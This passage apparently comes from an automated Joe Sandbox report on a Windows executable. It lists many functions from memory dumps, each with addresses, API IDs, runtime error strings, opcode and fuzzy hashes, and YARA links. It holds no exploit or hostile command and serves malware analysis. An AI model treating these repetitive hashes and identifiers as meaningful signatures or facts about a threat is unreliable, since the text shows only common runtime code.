                                                        • Instruction ID: 725f5092317ae6827ac2c2a867919d96396d1636ef811518c8fdc01b21a83822
                                                        • Opcode Fuzzy Hash: dd278a7fd6d6c57ce7ff34922fc15c7e4d8852c79c5206768016da5021ba02df
                                                        • Instruction Fuzzy Hash: 26018F23B0D65695EA19EB2B7C0066EAA54BF89BE4F990031ED4E47350DE7CD882C750
                                                        Function 00007FF70203EB20 Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCurrentHandleOpen
                                                        • String ID:
                                                        • API String ID: 2750122171-0
                                                        • Opcode ID: 792c670f67ce8086ccaddd993ff607e5911c7104a5a57520d2c6a25a684940a0
                                                        • Instruction ID: d223228c64f3680f1df61d9ea3a061c5c2b049ca7c3f1f3ba96a3ead2a8f981b
                                                        • Opcode Fuzzy Hash: 792c670f67ce8086ccaddd993ff607e5911c7104a5a57520d2c6a25a684940a0
                                                        • Instruction Fuzzy Hash: 09F03A52F0D70282FA6A7B60BC54276A9B49F48764F844A34CA1F857E0DFBC7485C235
                                                        Function 00007FF70202E520 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 240memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualProtect.KERNEL32(00007FF70211C040,00007FF70211C048,00000000,?,?,?,?,?,00007FF702021254,?,?,?,00007FF702021426), ref: 00007FF70202E6FD
                                                        Strings
                                                        • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF70202E86A
                                                        • Unknown pseudo relocation protocol version %d., xrefs: 00007FF70202E876
                                                        • Unknown pseudo relocation bit size %d., xrefs: 00007FF70202E854
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                        • API String ID: 544645111-1286557213
                                                        • Opcode ID: c283504df8df7abe10d18fc4cde8ed1f54bdd45d2765a5feb47e2cb1e7479264
                                                        • Instruction ID: 44f3e9a1184492f294cb575250453d69446a0bc8726f0e00e36c3ae3ca04a4c0
                                                        • Opcode Fuzzy Hash: c283504df8df7abe10d18fc4cde8ed1f54bdd45d2765a5feb47e2cb1e7479264
                                                        • Instruction Fuzzy Hash: 7A91E527F8875285EA10BB15DD40279AA50BF50764F948233CE6D17BC4DFBCF849C268
                                                        Function 00007FF70202E8D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: 7f84f60ff5cf04060731ac61783cf7986382f644bfd7f88686f7f1402d40d4b1
                                                        • Instruction ID: 6da4d1fc57832d6bbff19ff499f64b6e07b777be06ba85eec5e72fbb948c7497
                                                        • Opcode Fuzzy Hash: 7f84f60ff5cf04060731ac61783cf7986382f644bfd7f88686f7f1402d40d4b1
                                                        • Instruction Fuzzy Hash: 00219F63E8D30345FAA8B255C841378D9819F4A364F984937C51D963D1CFDCB8C9C22A
                                                        Function 00007FF70203EE20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID: RWL%p %lu %s$RWL%p %lu V=%0X B=%d r=%ld w=%ld L=%p %s
                                                        • API String ID: 2882836952-1296656760
                                                        • Opcode ID: d05c0e81d0e59c9f97a6fa566c81ae158088767e247a107a9ca2e1620dfed178
                                                        • Instruction ID: fbb80019ef32fa19369e1e31d2376bb8af81cf4048d4a4c65268c0e3bcf433a8
                                                        • Opcode Fuzzy Hash: d05c0e81d0e59c9f97a6fa566c81ae158088767e247a107a9ca2e1620dfed178
                                                        • Instruction Fuzzy Hash: B3015723B08A4586E651AB15F854769BAB8AF88BE8F844034DE0C83750DF7CE485CB14
                                                        Function 00007FF70203BE40 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: CurrentDebugOutputStringThreadabort
                                                        • String ID: Error cleaning up spin_keys for thread %lu.
                                                        • API String ID: 3512971422-1576690263
                                                        • Opcode ID: d07fa06faa29b27c40f8b835343e59f8bfc70491305b734a4ed49b8cfd4bd1c1
                                                        • Instruction ID: 5d33cea57ea0db52aa7cb9cee09fedd896ae83d8c33dac5a8081c5d7509058ab
                                                        • Opcode Fuzzy Hash: d07fa06faa29b27c40f8b835343e59f8bfc70491305b734a4ed49b8cfd4bd1c1
                                                        • Instruction Fuzzy Hash: A001EC32618B4581E750AB11F85435BBBB0FB84788F945135EA8907B64CFBDC049C754
                                                        Function 00007FF70202DEB0 Relevance: 6.4, APIs: 5, Instructions: 116stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: freememcpystrlen
                                                        • String ID:
                                                        • API String ID: 2208669145-0
                                                        • Opcode ID: 9fc533324164f935c2364f9bf464a3e46ad59f9d1e089cf09853e4184dee2ba7
                                                        • Instruction ID: a62d3d7e77dba2fc4098854c19407e41a7a2a06a571eb704752082e037ca8c20
                                                        • Opcode Fuzzy Hash: 9fc533324164f935c2364f9bf464a3e46ad59f9d1e089cf09853e4184dee2ba7
                                                        • Instruction Fuzzy Hash: 1741C423A5D74281F9A1BA11DE4037ADE906F417D4FD44233ED5D07AD4DFACE846C228
                                                        Function 00007FF70203C0D0 Relevance: 6.3, APIs: 5, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: free
                                                        • String ID:
                                                        • API String ID: 1294909896-0
                                                        • Opcode ID: 6dacb19ca94d7458726d0e76dbabd03d5c40887ee5cb15d07da37d67ef99ee77
                                                        • Instruction ID: 60f04dd9731ac6b17c60415422134b318b646ec3fa3730b6815d8192b258820f
                                                        • Opcode Fuzzy Hash: 6dacb19ca94d7458726d0e76dbabd03d5c40887ee5cb15d07da37d67ef99ee77
                                                        • Instruction Fuzzy Hash: 67317223B0DB4A80FA54EB15AE103B9AB95AF54B94FC44537C90EA7390CFFCA481D365
                                                        Function 00007FF702033680 Relevance: 6.2, APIs: 4, Instructions: 244COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22030d5e88b482d3743af298fae68df3e16c802e63aeccc8e275c0edf7718f83
                                                        • Instruction ID: 9a2ed96c50b193ad3fe8825bc1808bef65b11a25153a1ebf1e0678e9ecd93fc2
                                                        • Opcode Fuzzy Hash: 22030d5e88b482d3743af298fae68df3e16c802e63aeccc8e275c0edf7718f83
                                                        • Instruction Fuzzy Hash: 2191C4B3E0C35286E765AF258A84379AE95AF04B58F958171CE0C177C4CBBCE845C7A4
                                                        Function 00007FF702028447 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 237COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ${lambda$}
                                                        • API String ID: 0-105588721
                                                        • Opcode ID: 2d8188066e39781a7f9651805f998805f169e61317735e10ec106dfa6fa46d36
                                                        • Instruction ID: ad06ab2a87398f8d33e21360faa6ce0a7483c8073ccb94bc82479dfcd08265ba
                                                        • Opcode Fuzzy Hash: 2d8188066e39781a7f9651805f998805f169e61317735e10ec106dfa6fa46d36
                                                        • Instruction Fuzzy Hash: 81C15E336087C686D7559F24D8443E97BA1FF14B48F988136DE890B78ACFB9E489D324
                                                        Function 00007FF7020AF920 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: basic_string: construction from null is not valid
                                                        • API String ID: 0-2991274800
                                                        • Opcode ID: 304156df6dddfbb566614ccd314fad6cf477becbfbbf05d378e380275f613982
                                                        • Instruction ID: d706f29e6fa3dfde8a34afa8c61ae68117bff148acfe32d3856218af7b6534af
                                                        • Opcode Fuzzy Hash: 304156df6dddfbb566614ccd314fad6cf477becbfbbf05d378e380275f613982
                                                        • Instruction Fuzzy Hash: E751A033A09B9284EAA1AF25E8441ADAB64FF59BC4FC84132DF8D07B59CF6CD551C324
                                                        Function 00007FF7020AABA0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 180COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::erase
                                                        • API String ID: 0-2652434754
                                                        • Opcode ID: 1ef0fef5ba1e1d1f343b249ee758d00d44de106f6c7f083d84b74aaab6fc0e06
                                                        • Instruction ID: 023bd2983b3cda6c592f94ff2979d80f7d8c9dd3a1a6360273005e46021dfbaa
                                                        • Opcode Fuzzy Hash: 1ef0fef5ba1e1d1f343b249ee758d00d44de106f6c7f083d84b74aaab6fc0e06
                                                        • Instruction Fuzzy Hash: 4E51DE63B09B4689EA81AA2AD8442ADAB60AF55BD4FD88132DF4D077E4DF6CD441C324
                                                        Function 00007FF70204F2F0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 142stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: strlenwcslen
                                                        • String ID: basic_string: construction from null is not valid
                                                        • API String ID: 803329031-2991274800
                                                        • Opcode ID: d8c195bd3da8e58cdfddd8ba6febd6ec926384a20d73214d80a6b72cbedbe1c4
                                                        • Instruction ID: 6246e918d57f25276523993c75b724eeb4e2b0415aac85fc08275232a2543597
                                                        • Opcode Fuzzy Hash: d8c195bd3da8e58cdfddd8ba6febd6ec926384a20d73214d80a6b72cbedbe1c4
                                                        • Instruction Fuzzy Hash: 30419267A09B4695EE60AF19E84416DAB60FF88FD8BC48532DE4C07B64DFBCE541C324
                                                        Function 00007FF70204ECE0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 142stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: strlenwcslen
                                                        • String ID: basic_string: construction from null is not valid
                                                        • API String ID: 803329031-2991274800
                                                        • Opcode ID: f7acca5ca4dc4812154b8b29c3a2c1852bbf40a7ba5651a066b1a7ccd6d34142
                                                        • Instruction ID: a61aa3cf0bb35ad3f8d9c5bc2c7a0f394aeb8860fd2117c65aa4aec91be24ad1
                                                        • Opcode Fuzzy Hash: f7acca5ca4dc4812154b8b29c3a2c1852bbf40a7ba5651a066b1a7ccd6d34142
                                                        • Instruction Fuzzy Hash: C4419F67A09B4694EE61AF1AEC4016DAB60FF48FC4B888532DE5C07764DFBCE551C324
                                                        Function 00007FF7020AA050 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 142COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
                                                        • API String ID: 0-2669816585
                                                        • Opcode ID: cb62f2d298aae9d7033f1ca6c68aa69db820629229d98394959fffa6e98a667d
                                                        • Instruction ID: facc13113b8a1a674414adb5afe37fdf7004d00a68fdee60c5604e83cc0e43ec
                                                        • Opcode Fuzzy Hash: cb62f2d298aae9d7033f1ca6c68aa69db820629229d98394959fffa6e98a667d
                                                        • Instruction Fuzzy Hash: 7A419C63B0974680EA90AA2AD8415BDEB60AF49FD4FD48132DA0C177D5DFACE542C368
                                                        Function 00007FF702052230 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: strlen
                                                        • String ID: basic_string: construction from null is not valid
                                                        • API String ID: 39653677-2991274800
                                                        • Opcode ID: 4c80aafae4ded85dc9a87886eb9d9e66b3a3220671215cf906b56b8c4b349396
                                                        • Instruction ID: 7793be0c7a9f64e49b6d996abd1a304f619370e57272d754754982a84ff42933
                                                        • Opcode Fuzzy Hash: 4c80aafae4ded85dc9a87886eb9d9e66b3a3220671215cf906b56b8c4b349396
                                                        • Instruction Fuzzy Hash: 7E218263B49B1991DE19BB1AA8400EDAB10EF48F847C80431DE0C1B765DF6CE987C324
                                                        Function 00007FF702039660 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: Byte$CharLeadMultiWide
                                                        • String ID:
                                                        • API String ID: 2561704868-0
                                                        • Opcode ID: 3a6d45c9e28d1e79da70ebb51d00a9fbba97a7a5512165081ede9fc886179a9e
                                                        • Instruction ID: 6d1d7b6a444907ce037225654ea059846a1e6d2b988fed11a175f71650146478
                                                        • Opcode Fuzzy Hash: 3a6d45c9e28d1e79da70ebb51d00a9fbba97a7a5512165081ede9fc886179a9e
                                                        • Instruction Fuzzy Hash: 2131C177A0C78586E3609F24A9403A9BEA4FF90784F848135DA88877D4DFFDD445CB14
                                                        Function 00007FF7020AE140 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: setlocale$memcpystrlen
                                                        • String ID:
                                                        • API String ID: 4096897932-0
